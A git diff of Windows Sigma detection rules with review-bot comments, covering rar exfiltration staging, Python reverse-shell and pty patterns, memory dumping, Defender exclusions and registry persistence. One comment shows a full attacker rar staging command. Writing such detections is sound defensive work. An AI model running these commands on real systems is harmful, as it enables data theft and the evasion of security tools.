process_creation and selection falsepositives: - Legitimate use diff --git a/sigma/sysmon/process_creation/proc_creation_win_pua_wsudo_susp_execution.yml b/sigma/sysmon/process_creation/proc_creation_win_pua_wsudo_susp_execution.yml index 1f2eb18f9..c6899496d 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_pua_wsudo_susp_execution.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_pua_wsudo_susp_execution.yml 
@@ -1,9 +1,7 @@ title: PUA - Wsudo Suspicious Execution id: bdeeabc9-ff2a-4a51-be59-bb253aac7891 status: test -description: Detects usage of wsudo (Windows Sudo Utility). Which is a tool that let - the user execute programs with different permissions (System, Trusted Installer, - Administrator...etc) +description: Detects usage of wsudo (Windows Sudo Utility). Which is a tool that let the user execute programs with different permissions (System, Trusted Installer, Administrator...etc) references: - https://github.com/M2Team/Privexec/ author: Nasreddine Bencherchali (Nextron Systems) @@ -22,12 +20,12 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_metadata: - - Image|endswith: \wsudo.exe - - OriginalFileName: wsudo.exe - - Description: Windows sudo utility - - ParentImage|endswith: \wsudo-bridge.exe + - Image|endswith: \wsudo.exe + - OriginalFileName: wsudo.exe + - Description: Windows sudo utility + - ParentImage|endswith: \wsudo-bridge.exe selection_cli: - CommandLine|contains: + CommandLine|contains: - -u System - -uSystem - -u TrustedInstaller diff --git a/sigma/sysmon/process_creation/proc_creation_win_python_adidnsdump.yml b/sigma/sysmon/process_creation/proc_creation_win_python_adidnsdump.yml index c1ab640e5..cb197b13e 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_python_adidnsdump.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_python_adidnsdump.yml 
@@ -1,12 +1,9 @@ title: PUA - Adidnsdump Execution id: 26d3f0a2-f514-4a3f-a8a7-e7e48a8d9160 status: test -description: 'This tool enables enumeration and exporting of all DNS records in the - zone for recon purposes of internal networks Python 3 and python.exe must be installed, - +description: | + This tool enables enumeration and exporting of all DNS records in the zone for recon purposes of internal networks Python 3 and python.exe must be installed, Usee to Query/modify DNS records for Active Directory integrated DNS via LDAP - - ' references: - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1018/T1018.md#atomic-test-9---remote-system-discovery---adidnsdump author: frack113 @@ -25,7 +22,7 @@ detection: Channel: Microsoft-Windows-Sysmon/Operational selection: Image|endswith: \python.exe - CommandLine|contains: adidnsdump + CommandLine|contains: adidnsdump condition: process_creation and selection falsepositives: - Unknown diff --git a/sigma/sysmon/process_creation/proc_creation_win_python_inline_command_execution.yml b/sigma/sysmon/process_creation/proc_creation_win_python_inline_command_execution.yml index 3e7a86a09..8b8bbe620 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_python_inline_command_execution.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_python_inline_command_execution.yml @@ -1,8 +1,7 @@ title: Python Inline Command Execution id: 899133d5-4d7c-4a7f-94ee-27355c879d90 status: test -description: Detects execution of python using the "-c" flag. This is could be used - as a way to launch a reverse shell or execute live python code. +description: Detects execution of python using the "-c" flag. This is could be used as a way to launch a reverse shell or execute live python code. references: - https://docs.python.org/3/using/cmdline.html#cmdoption-c - https://www.revshells.com/ 
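Review bot: The description moved into a block scalar still contains the typo `Usee to Query/modify` and the run-on `... for recon purposes of internal networks Python 3 and python.exe must be installed,`; since the commit rewrites these lines anyway, fix them. Proposed text: `Detects the adidnsdump tool, which enumerates and exports all DNS records of an Active Directory-integrated DNS zone via LDAP for internal network recon. Python 3 (python.exe) must be installed; the tool can also be used to query/modify AD-integrated DNS records.`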
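Review bot: `Image|endswith: \python.exe` combined with `CommandLine|contains: adidnsdump` only sees invocations that go through python.exe directly; if the tool is installed with pip, I would expect the console-script wrapper to run as its own `adidnsdump.exe` image and not satisfy the image check — confirm against the referenced atomic test. If that is the case, restructure the selection into OR-ed branches, e.g. `- Image|endswith: \adidnsdump.exe` alongside the existing python.exe/`adidnsdump` pair, or at least record the limitation in a comment above `selection`.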
@@ -22,14 +21,14 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_img: - - OriginalFileName: python.exe - - Image|endswith: - - python.exe - - python3.exe - - python2.exe + - OriginalFileName: python.exe + - Image|endswith: + - python.exe # no \ bc of e.g. ipython.exe + - python3.exe + - python2.exe selection_cli: - CommandLine|contains: ' -c' - filter_python: + CommandLine|contains: ' -c' + filter_python: # Based on baseline ParentImage|startswith: C:\Program Files\Python ParentImage|endswith: \python.exe ParentCommandLine|contains: -E -s -m ensurepip -U --default-pip @@ -37,7 +36,6 @@ detection: ParentImage|endswith: \AppData\Local\Programs\Microsoft VS Code\Code.exe condition: process_creation and (all of selection_* and not 1 of filter_*) falsepositives: - - Python libraries that use a flag starting with "-c". Filter according to your - environment + - Python libraries that use a flag starting with "-c". Filter according to your environment level: medium ruletype: Sigma diff --git a/sigma/sysmon/process_creation/proc_creation_win_python_pty_spawn.yml b/sigma/sysmon/process_creation/proc_creation_win_python_pty_spawn.yml index 55447d70c..ed58f3d1d 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_python_pty_spawn.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_python_pty_spawn.yml @@ -1,8 +1,8 @@ title: Python Spawning Pretty TTY on Windows id: 480e7e51-e797-47e3-8d72-ebfce65b6d8d related: - - id: 899133d5-4d7c-4a7f-94ee-27355c879d90 - type: derived + - id: 899133d5-4d7c-4a7f-94ee-27355c879d90 + type: derived status: test description: Detects python spawning a pretty tty references: 
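Review bot: The added inline comment `# no \ bc of e.g. ipython.exe` is too terse to convey the trade-off; spell it out, e.g. `# no leading backslash on purpose: also matches ipython.exe and similarly named interpreters, at the cost of matching any image whose name merely ends in python.exe`. Worth noting in the same place that `CommandLine|contains: ' -c'` is a prefix match that hits any option starting with `-c` (the falsepositives entry concedes this); `' -c '` would be stricter but would miss `-c"..."`/`-c'...'` forms, so keeping the prefix form is defensible if that reasoning is written down. `filter_python` continues outside this hunk.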
@@ -22,15 +22,15 @@ detection: Channel: Microsoft-Windows-Sysmon/Operational selection_img: Image|endswith: - - python.exe + - python.exe # no \ bc of e.g. ipython.exe - python3.exe - python2.exe selection_cli_1: - CommandLine|contains|all: + CommandLine|contains|all: - import pty - .spawn( selection_cli_2: - CommandLine|contains: from pty import spawn + CommandLine|contains: from pty import spawn condition: process_creation and (selection_img and 1 of selection_cli_*) falsepositives: - Unknown diff --git a/sigma/sysmon/process_creation/proc_creation_win_query_session_exfil.yml b/sigma/sysmon/process_creation/proc_creation_win_query_session_exfil.yml index 3591fb4ba..de3591ac7 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_query_session_exfil.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_query_session_exfil.yml @@ -1,8 +1,7 @@ title: Query Usage To Exfil Data id: 53ef0cef-fa24-4f25-a34a-6c72dfa2e6e2 status: test -description: Detects usage of "query.exe" a system binary to exfil information such - as "sessions" and "processes" for later use +description: Detects usage of "query.exe" a system binary to exfil information such as "sessions" and "processes" for later use references: - https://twitter.com/MichalKoczwara/status/1553634816016498688 author: Nasreddine Bencherchali (Nextron Systems) @@ -20,7 +19,7 @@ detection: Channel: Microsoft-Windows-Sysmon/Operational selection: Image|endswith: :\Windows\System32\query.exe - CommandLine|contains: + CommandLine|contains: - session > - process > condition: process_creation and selection diff --git a/sigma/sysmon/process_creation/proc_creation_win_rar_compress_data.yml b/sigma/sysmon/process_creation/proc_creation_win_rar_compress_data.yml index d5789680d..1e2d12ba6 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_rar_compress_data.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_rar_compress_data.yml 
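Review bot: `selection_cli_1`/`selection_cli_2` key on the `pty` module, which to my knowledge is Unix-only and not importable on Windows, so the spawn itself fails; the value of the rule is in catching a copy-pasted Linux reverse-shell one-liner, and that should be stated in the description or a comment above `selection_cli_1`, e.g. `# pty is Unix-only; on Windows the import fails, but the attempt itself is the signal`. Also, `contains|all` on `import pty` and `.spawn(` is side-stepped by `__import__('pty').spawn(...)`; a third branch on `pty` plus `spawn(` is cheap if that matters. The same `# no \ bc of e.g. ipython.exe` shorthand appears here and deserves the same spelled-out wording as in the sibling rule.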
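Review bot: The `CommandLine|contains` values `session >` and `process >` rely on the redirection operator surviving into query.exe's own command line, but when the command is run through cmd.exe the shell consumes `>` and spawns query.exe with just `query session`; the match would then presumably only fire when the whole string is handed to query.exe verbatim (a script or tool that does not shell out). Confirm against the referenced sample and document the assumption, e.g. `# expects the redirection to be part of query.exe's own command line; cmd.exe-driven invocations will show it on the parent cmd.exe instead`. If the cmd.exe case matters, a companion selection on `Image|endswith: \cmd.exe` with `query session >`/`query process >` would cover it.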
@@ -1,10 +1,7 @@ title: Files Added To An Archive Using Rar.EXE id: 6f3e2987-db24-4c78-a860-b4f4095a7095 status: test -description: Detects usage of "rar" to add files to an archive for potential compression. - An adversary may compress data (e.g. sensitive documents) that is collected prior - to exfiltration in order to make it portable and minimize the amount of data sent - over the network. +description: Detects usage of "rar" to add files to an archive for potential compression. An adversary may compress data (e.g. sensitive documents) that is collected prior to exfiltration in order to make it portable and minimize the amount of data sent over the network. references: - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1560.001/T1560.001.md - https://eqllib.readthedocs.io/en/latest/analytics/1ec33c93-3d0b-4a28-8014-dbdaae5c60ae.html @@ -24,7 +21,7 @@ detection: Channel: Microsoft-Windows-Sysmon/Operational selection: Image|endswith: \rar.exe - CommandLine|contains: ' a ' + CommandLine|contains: ' a ' condition: process_creation and selection falsepositives: - Highly likely if rar is a default archiver in the monitored environment. diff --git a/sigma/sysmon/process_creation/proc_creation_win_rar_compression_with_password.yml b/sigma/sysmon/process_creation/proc_creation_win_rar_compression_with_password.yml index 7c0abe19b..706055a92 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_rar_compression_with_password.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_rar_compression_with_password.yml 
@@ -1,9 +1,7 @@ title: Rar Usage with Password and Compression Level id: faa48cae-6b25-4f00-a094-08947fef582f status: test -description: Detects the use of rar.exe, on the command line, to create an archive - with password protection or with a specific compression level. This is pretty - indicative of malicious actions. +description: Detects the use of rar.exe, on the command line, to create an archive with password protection or with a specific compression level. This is pretty indicative of malicious actions. references: - https://labs.sentinelone.com/the-anatomy-of-an-apt-attack-and-cobaltstrike-beacons-encoded-configuration/ - https://ss64.com/bash/rar.html @@ -23,9 +21,9 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_password: - CommandLine|contains: ' -hp' + CommandLine|contains: ' -hp' selection_other: - CommandLine|contains: + CommandLine|contains: - ' -m' - ' a ' condition: process_creation and (selection_password and selection_other) diff --git a/sigma/sysmon/process_creation/proc_creation_win_rar_susp_greedy_compression.yml b/sigma/sysmon/process_creation/proc_creation_win_rar_susp_greedy_compression.yml index f8bcc5b6f..98893725d 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_rar_susp_greedy_compression.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_rar_susp_greedy_compression.yml @@ -1,8 +1,7 @@ title: Suspicious Greedy Compression Using Rar.EXE id: afe52666-401e-4a02-b4ff-5d128990b8cb status: experimental -description: Detects RAR usage that creates an archive from a suspicious folder, either - a system folder or one of the folders often used by attackers for staging purposes +description: Detects RAR usage that creates an archive from a suspicious folder, either a system folder or one of the folders often used by attackers for staging purposes references: - https://decoded.avast.io/martinchlumecky/png-steganography author: X__Junior (Nextron Systems), Florian Roth (Nextron Systems) 
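Review bot: `selection_password` matches only the `-hp` switch (header plus data encryption); rar's `-p<pwd>` switch, which encrypts file data but leaves headers in clear, is not covered although it serves the exfil use case the description names — if that is deliberate, say so in a comment, otherwise add a `- ' -p'` entry (noting that `' -p'` alone is broad). Separately, the description says `rar.exe` but the selections carry no `Image`/`OriginalFileName` constraint, so the rule fires for any process whose command line contains ` -hp` together with ` -m` or ` a `; presumably intended so a renamed rar binary is still caught, which a comment like `# deliberately no image check: a renamed rar.exe is still caught via its switches` should make explicit.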
@@ -16,22 +15,23 @@ logsource: product: windows category: process_creation detection: + # Example : rar.exe a -m5 -r -y -ta20210204000000 -hp1qazxcde32ws -v2560k Asia1Dpt-PC-c.rar c:\\*.doc c:\\*.docx c:\\*.xls c:\\*.xlsx c:\\*.pdf c:\\*.ppt c:\\*.pptx c:\\*.jpg c:\\*.txt >nul process_creation: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_opt_1: - - Image|endswith: \rar.exe - - Description: Command line RAR + - Image|endswith: \rar.exe + - Description: Command line RAR selection_opt_2: - CommandLine|contains: + CommandLine|contains: - '.exe a ' - ' a -m' selection_cli_flags: - CommandLine|contains|all: - - ' -hp' - - ' -r ' + CommandLine|contains|all: + - ' -hp' # password + - ' -r ' # recursive selection_cli_folders: - CommandLine|contains: + CommandLine|contains: - ' ?:\\\*.' - ' ?:\\\\\*.' - ' ?:\$Recycle.bin\' diff --git a/sigma/sysmon/process_creation/proc_creation_win_rasdial_execution.yml b/sigma/sysmon/process_creation/proc_creation_win_rasdial_execution.yml index 65fcb214c..245f495a9 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_rasdial_execution.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_rasdial_execution.yml @@ -23,7 +23,6 @@ detection: Image|endswith: rasdial.exe condition: process_creation and selection falsepositives: - - False positives depend on scripts and administrative tools used in the monitored - environment + - False positives depend on scripts and administrative tools used in the monitored environment level: medium ruletype: Sigma diff --git a/sigma/sysmon/process_creation/proc_creation_win_rdrleakdiag_process_dumping.yml b/sigma/sysmon/process_creation/proc_creation_win_rdrleakdiag_process_dumping.yml index 94350a0c6..0a1505601 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_rdrleakdiag_process_dumping.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_rdrleakdiag_process_dumping.yml 
@@ -1,18 +1,16 @@ title: Process Memory Dump via RdrLeakDiag.EXE id: edadb1e5-5919-4e4c-8462-a9e643b02c4b related: - - id: 6355a919-2e97-4285-a673-74645566340d - type: obsoletes + - id: 6355a919-2e97-4285-a673-74645566340d + type: obsoletes status: test -description: Detects the use of the Microsoft Windows Resource Leak Diagnostic tool - "rdrleakdiag.exe" to dump process memory +description: Detects the use of the Microsoft Windows Resource Leak Diagnostic tool "rdrleakdiag.exe" to dump process memory references: - https://www.pureid.io/dumping-abusing-windows-credentials-part-1/ - https://www.crowdstrike.com/blog/overwatch-exposes-aquatic-panda-in-possession-of-log-4-shell-exploit-tools/ - https://lolbas-project.github.io/lolbas/Binaries/Rdrleakdiag/ - https://twitter.com/0gtweet/status/1299071304805560321?s=21 -author: Cedric MAURUGEON, Florian Roth (Nextron Systems), Swachchhanda Shrawan Poudel, - Nasreddine Bencherchali (Nextron Systems) +author: Cedric MAURUGEON, Florian Roth (Nextron Systems), Swachchhanda Shrawan Poudel, Nasreddine Bencherchali (Nextron Systems) date: 2021/09/24 modified: 2023/04/24 tags: @@ -27,23 +25,22 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_img: - - Image|endswith: \rdrleakdiag.exe - - OriginalFileName: RdrLeakDiag.exe + - Image|endswith: \rdrleakdiag.exe + - OriginalFileName: RdrLeakDiag.exe selection_cli_dump: - CommandLine|contains: + CommandLine|contains: - fullmemdmp - /memdmp - -memdmp selection_cli_output: - CommandLine|contains: + CommandLine|contains: - ' -o ' - ' /o ' selection_cli_process: - CommandLine|contains: + CommandLine|contains: - ' -p ' - ' /p ' - condition: process_creation and (all of selection_cli_* or (selection_img and - selection_cli_dump)) + condition: process_creation and (all of selection_cli_* or (selection_img and selection_cli_dump)) falsepositives: - Unknown level: high 
diff --git a/sigma/sysmon/process_creation/proc_creation_win_reg_add_run_key.yml b/sigma/sysmon/process_creation/proc_creation_win_reg_add_run_key.yml index a33c789b9..a7ca56db2 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_reg_add_run_key.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_reg_add_run_key.yml @@ -1,8 +1,7 @@ title: Potential Persistence Attempt Via Run Keys Using Reg.EXE id: de587dce-915e-4218-aac4-835ca6af6f70 status: test -description: Detects suspicious command line reg.exe tool adding key to RUN key in - Registry +description: Detects suspicious command line reg.exe tool adding key to RUN key in Registry references: - https://app.any.run/tasks/9c0f37bc-867a-4314-b685-e101566766d7/ - https://docs.microsoft.com/en-us/windows/win32/setupapi/run-and-runonce-registry-keys @@ -21,14 +20,13 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection: - CommandLine|contains|all: + CommandLine|contains|all: - reg - ' ADD ' - Software\Microsoft\Windows\CurrentVersion\Run condition: process_creation and selection falsepositives: - - Legitimate software automatically (mostly, during installation) sets up autorun - keys for legitimate reasons. + - Legitimate software automatically (mostly, during installation) sets up autorun keys for legitimate reasons. - Legitimate administrator sets up autorun keys for legitimate reasons. - Discord level: medium diff --git a/sigma/sysmon/process_creation/proc_creation_win_reg_add_safeboot.yml b/sigma/sysmon/process_creation/proc_creation_win_reg_add_safeboot.yml index a0a834622..436e592b8 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_reg_add_safeboot.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_reg_add_safeboot.yml 
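Review bot: The three `contains|all` tokens are broader than the description suggests and the intent should be documented: `Software\Microsoft\Windows\CurrentVersion\Run` also matches `RunOnce`, `RunOnceEx` and `RunServices`, which is presumably wanted (`# 'Run' prefix intentionally covers Run, RunOnce, RunOnceEx, RunServices`), and bare `reg` matches any command line containing those letters (e.g. `regsvr32`, a script that merely echoes such a string), so with no `Image`/`OriginalFileName` anchor the `' ADD '` token is doing most of the work. If a renamed reg.exe is not a concern, anchoring on `OriginalFileName: reg.exe` as in the SafeBoot rule of this batch would cut the false positives the `falsepositives` section already lists.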
@@ -1,12 +1,10 @@ title: Add SafeBoot Keys Via Reg Utility id: d7662ff6-9e97-4596-a61d-9839e32dee8d related: - - id: fc0e89b5-adb0-43c1-b749-c12a10ec37de - type: similar + - id: fc0e89b5-adb0-43c1-b749-c12a10ec37de + type: similar status: test -description: Detects execution of "reg.exe" commands with the "add" or "copy" flags - on safe boot registry keys. Often used by attacker to allow the ransomware to - work in safe mode as some security products do not +description: Detects execution of "reg.exe" commands with the "add" or "copy" flags on safe boot registry keys. Often used by attacker to allow the ransomware to work in safe mode as some security products do not references: - https://redacted.com/blog/bianlian-ransomware-gang-gives-it-a-go/ author: Nasreddine Bencherchali (Nextron Systems) @@ -23,12 +21,12 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_img: - - Image|endswith: reg.exe - - OriginalFileName: reg.exe + - Image|endswith: reg.exe + - OriginalFileName: reg.exe selection_safeboot: - CommandLine|contains: \SYSTEM\CurrentControlSet\Control\SafeBoot + CommandLine|contains: \SYSTEM\CurrentControlSet\Control\SafeBoot selection_flag: - CommandLine|contains: + CommandLine|contains: - ' copy ' - ' add ' condition: process_creation and (all of selection*) diff --git a/sigma/sysmon/process_creation/proc_creation_win_reg_bitlocker.yml b/sigma/sysmon/process_creation/proc_creation_win_reg_bitlocker.yml index a6f10f3c4..d6e653449 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_reg_bitlocker.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_reg_bitlocker.yml 
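Review bot: `Image|endswith: reg.exe` lacks the leading backslash that the other reg rules in this batch use (`\reg.exe` in the Defender-exclusion rule), so any image whose file name merely ends in `reg.exe` (e.g. `foo_reg.exe`) matches; change it to `- Image|endswith: \reg.exe`. If the omission is intentional, a comment saying so would stop the next maintainer from "fixing" it.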
@@ -1,8 +1,7 @@
 title: Suspicious Reg Add BitLocker
 id: 0e0255bf-2548-47b8-9582-c0955c9283f5
 status: test
-description: Detects suspicious addition to BitLocker related registry keys via the
- reg.exe utility
+description: Detects suspicious addition to BitLocker related registry keys via the reg.exe utility
 references:
 - https://thedfirreport.com/2021/11/15/exchange-exploit-leads-to-domain-wide-ransomware/
 author: frack113
@@ -20,13 +19,13 @@ detection:
 EventID: 1
 Channel: Microsoft-Windows-Sysmon/Operational
 selection:
- CommandLine|contains|all:
+ CommandLine|contains|all:
 - REG
 - ADD
 - \SOFTWARE\Policies\Microsoft\FVE
 - /v
 - /f
- CommandLine|contains:
+ CommandLine|contains:
 - EnableBDEWithNoTPM
 - UseAdvancedStartup
 - UseTPM
diff --git a/sigma/sysmon/process_creation/proc_creation_win_reg_credential_access_via_password_filter.yml b/sigma/sysmon/process_creation/proc_creation_win_reg_credential_access_via_password_filter.yml
index f2965445c..e5dec018c 100644
--- a/sigma/sysmon/process_creation/proc_creation_win_reg_credential_access_via_password_filter.yml
+++ b/sigma/sysmon/process_creation/proc_creation_win_reg_credential_access_via_password_filter.yml
@@ -1,8 +1,7 @@
 title: Dropping Of Password Filter DLL
 id: b7966f4a-b333-455b-8370-8ca53c229762
 status: test
-description: Detects dropping of dll files in system32 that may be used to retrieve
- user credentials from LSASS
+description: Detects dropping of dll files in system32 that may be used to retrieve user credentials from LSASS
 references:
 - https://pentestlab.blog/2020/02/10/credential-access-password-filter-dll/
 - https://github.com/3gstudent/PasswordFilter/tree/master/PasswordFilter
@@ -21,7 +20,7 @@ detection:
 EventID: 1
 Channel: Microsoft-Windows-Sysmon/Operational
 selection_cmdline:
- CommandLine|contains|all:
+ CommandLine|contains|all:
 - HKLM\SYSTEM\CurrentControlSet\Control\Lsa
 - scecli\0*
 - reg add
diff --git a/sigma/sysmon/process_creation/proc_creation_win_reg_defender_exclusion.yml b/sigma/sysmon/process_creation/proc_creation_win_reg_defender_exclusion.yml
index 04247e478..02c10903d 100644
--- a/sigma/sysmon/process_creation/proc_creation_win_reg_defender_exclusion.yml
+++ b/sigma/sysmon/process_creation/proc_creation_win_reg_defender_exclusion.yml
@@ -1,9 +1,7 @@
 title: Suspicious Windows Defender Folder Exclusion Added Via Reg.EXE
 id: 48917adc-a28e-4f5d-b729-11e75da8941f
 status: test
-description: Detects the usage of "reg.exe" to add Defender folder exclusions. Qbot
- has been seen using this technique to add exclusions for folders within AppData
- and ProgramData.
+description: Detects the usage of "reg.exe" to add Defender folder exclusions. Qbot has been seen using this technique to add exclusions for folders within AppData and ProgramData.
 references:
 - https://thedfirreport.com/2022/02/07/qbot-likes-to-move-it-move-it/
 - https://redcanary.com/threat-detection-report/threats/qbot/
@@ -23,10 +21,10 @@ detection:
 Channel: Microsoft-Windows-Sysmon/Operational
 selection:
 Image|endswith: \reg.exe
- CommandLine|contains:
+ CommandLine|contains:
 - SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths
 - SOFTWARE\Microsoft\Microsoft Antimalware\Exclusions\Paths
- CommandLine|contains|all:
+ CommandLine|contains|all:
 - 'ADD '
 - '/t '
 - 'REG_DWORD '
diff --git a/sigma/sysmon/process_creation/proc_creation_win_reg_delete_safeboot.yml b/sigma/sysmon/process_creation/proc_creation_win_reg_delete_safeboot.yml
index bfa3b5680..796d51c04 100644
--- a/sigma/sysmon/process_creation/proc_creation_win_reg_delete_safeboot.yml
+++ b/sigma/sysmon/process_creation/proc_creation_win_reg_delete_safeboot.yml
@@ -1,12 +1,10 @@
 title: SafeBoot Registry Key Deleted Via Reg.EXE
 id: fc0e89b5-adb0-43c1-b749-c12a10ec37de
 related:
- - id: d7662ff6-9e97-4596-a61d-9839e32dee8d
- type: similar
+ - id: d7662ff6-9e97-4596-a61d-9839e32dee8d
+ type: similar
 status: test
-description: Detects execution of "reg.exe" commands with the "delete" flag on safe
- boot registry keys. Often used by attacker to prevent safeboot execution of security
- products
+description: Detects execution of "reg.exe" commands with the "delete" flag on safe boot registry keys. Often used by attacker to prevent safeboot execution of security products
 references:
 - https://www.trendmicro.com/en_us/research/22/e/avoslocker-ransomware-variant-abuses-driver-file-to-disable-anti-Virus-scans-log4shell.html
 author: Nasreddine Bencherchali (Nextron Systems), Tim Shelton
@@ -24,10 +22,10 @@ detection:
 EventID: 1
 Channel: Microsoft-Windows-Sysmon/Operational
 selection_img:
- - Image|endswith: reg.exe
- - OriginalFileName: reg.exe
+ - Image|endswith: reg.exe
+ - OriginalFileName: reg.exe
 selection_delete:
- CommandLine|contains|all:
+ CommandLine|contains|all:
 - ' delete '
 - \SYSTEM\CurrentControlSet\Control\SafeBoot
 condition: process_creation and (all of selection_*)
diff --git a/sigma/sysmon/process_creation/proc_creation_win_reg_delete_services.yml b/sigma/sysmon/process_creation/proc_creation_win_reg_delete_services.yml
index 490b163af..3f7939710 100644
--- a/sigma/sysmon/process_creation/proc_creation_win_reg_delete_services.yml
+++ b/sigma/sysmon/process_creation/proc_creation_win_reg_delete_services.yml
@@ -1,8 +1,7 @@
 title: Service Registry Key Deleted Via Reg.EXE
 id: 05b2aa93-1210-42c8-8d9a-2fcc13b284f5
 status: test
-description: Detects execution of "reg.exe" commands with the "delete" flag on services
- registry key. Often used by attacker to remove AV software services
+description: Detects execution of "reg.exe" commands with the "delete" flag on services registry key. Often used by attacker to remove AV software services
 references:
 - https://www.virustotal.com/gui/file/2bcd5702a7565952c44075ac6fb946c7780526640d1264f692c7664c02c68465
 author: Nasreddine Bencherchali (Nextron Systems)
@@ -20,12 +19,13 @@ detection:
 EventID: 1
 Channel: Microsoft-Windows-Sysmon/Operational
 selection_img:
- - Image|endswith: reg.exe
- - OriginalFileName: reg.exe
+ - Image|endswith: reg.exe
+ - OriginalFileName: reg.exe
 selection_delete:
- CommandLine|contains: ' delete '
+ CommandLine|contains: ' delete '
 selection_key:
- CommandLine|contains: \SYSTEM\CurrentControlSet\services\
+ # Add specific services if you would like the rule to be more specific
+ CommandLine|contains: \SYSTEM\CurrentControlSet\services\
 condition: process_creation and (all of selection_*)
 falsepositives:
 - Unlikely
diff --git a/sigma/sysmon/process_creation/proc_creation_win_reg_desktop_background_change.yml b/sigma/sysmon/process_creation/proc_creation_win_reg_desktop_background_change.yml
index ff044acc3..e70e0b25a 100644
--- a/sigma/sysmon/process_creation/proc_creation_win_reg_desktop_background_change.yml
+++ b/sigma/sysmon/process_creation/proc_creation_win_reg_desktop_background_change.yml
@@ -1,16 +1,12 @@
 title: Potentially Suspicious Desktop Background Change Using Reg.EXE
 id: 8cbc9475-8d05-4e27-9c32-df960716c701
 related:
- - id: 85b88e05-dadc-430b-8a9e-53ff1cd30aae
- type: similar
+ - id: 85b88e05-dadc-430b-8a9e-53ff1cd30aae
+ type: similar
 status: experimental
-description: 'Detects the execution of "reg.exe" to alter registry keys that would
- replace the user''s desktop background.
-
- This is a common technique used by malware to change the desktop background to
- a ransom note or other image.
-
- '
+description: |
+ Detects the execution of "reg.exe" to alter registry keys that would replace the user's desktop background.
+ This is a common technique used by malware to change the desktop background to a ransom note or other image.
 references:
 - https://www.attackiq.com/2023/09/20/emulating-rhysida/
 - https://research.checkpoint.com/2023/the-rhysida-ransomware-activity-analysis-and-ties-to-vice-society/
@@ -30,35 +26,34 @@ logsource:
 product: windows
 category: process_creation
 detection:
+ # TODO: Improve this to also focus on variation using PowerShell and other CLI tools
 process_creation:
 EventID: 1
 Channel: Microsoft-Windows-Sysmon/Operational
 selection_reg_img:
- - Image|endswith: \reg.exe
- - OriginalFileName: reg.exe
+ - Image|endswith: \reg.exe
+ - OriginalFileName: reg.exe
 selection_reg_flag:
- CommandLine|contains: add
+ CommandLine|contains: add
 selection_keys:
- CommandLine|contains:
+ CommandLine|contains:
 - Control Panel\Desktop
 - CurrentVersion\Policies\ActiveDesktop
 - CurrentVersion\Policies\System
 selection_cli_reg_1:
- CommandLine|contains|all:
+ CommandLine|contains|all:
 - /v NoChangingWallpaper
- - /d 1
+ - /d 1 # Prevent changing desktop background
 selection_cli_reg_2:
- CommandLine|contains|all:
+ CommandLine|contains|all:
 - /v Wallpaper
 - /t REG_SZ
 selection_cli_reg_3:
- CommandLine|contains|all:
+ CommandLine|contains|all:
 - /v WallpaperStyle
- - /d 2
- condition: process_creation and (all of selection_reg_* and selection_keys and
- 1 of selection_cli_reg_*)
+ - /d 2 # Stretch
+ condition: process_creation and (all of selection_reg_* and selection_keys and 1 of selection_cli_reg_*)
 falsepositives:
- - Administrative scripts that change the desktop background to a company logo
- or other image.
+ - Administrative scripts that change the desktop background to a company logo or other image.
 level: medium
 ruletype: Sigma
diff --git a/sigma/sysmon/process_creation/proc_creation_win_reg_direct_asep_registry_keys_modification.yml b/sigma/sysmon/process_creation/proc_creation_win_reg_direct_asep_registry_keys_modification.yml
index 869ad17d4..fb455c396 100644
--- a/sigma/sysmon/process_creation/proc_creation_win_reg_direct_asep_registry_keys_modification.yml
+++ b/sigma/sysmon/process_creation/proc_creation_win_reg_direct_asep_registry_keys_modification.yml
@@ -1,8 +1,7 @@
 title: Direct Autorun Keys Modification
 id: 24357373-078f-44ed-9ac4-6d334a668a11
 status: test
-description: Detects direct modification of autostart extensibility point (ASEP) in
- registry using reg.exe.
+description: Detects direct modification of autostart extensibility point (ASEP) in registry using reg.exe.
 references:
 - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1547.001/T1547.001.md
 author: Victor Sergeev, Daniil Yugoslavskiy, oscd.community
@@ -21,10 +20,10 @@ detection:
 Channel: Microsoft-Windows-Sysmon/Operational
 selection_1:
 Image|endswith: \reg.exe
- CommandLine|contains: add
+ CommandLine|contains: add # to avoid intersection with discovery tactic rules
 selection_2:
- CommandLine|contains:
- - \software\Microsoft\Windows\CurrentVersion\Run
+ CommandLine|contains: # need to improve this list, there are plenty of ASEP reg keys
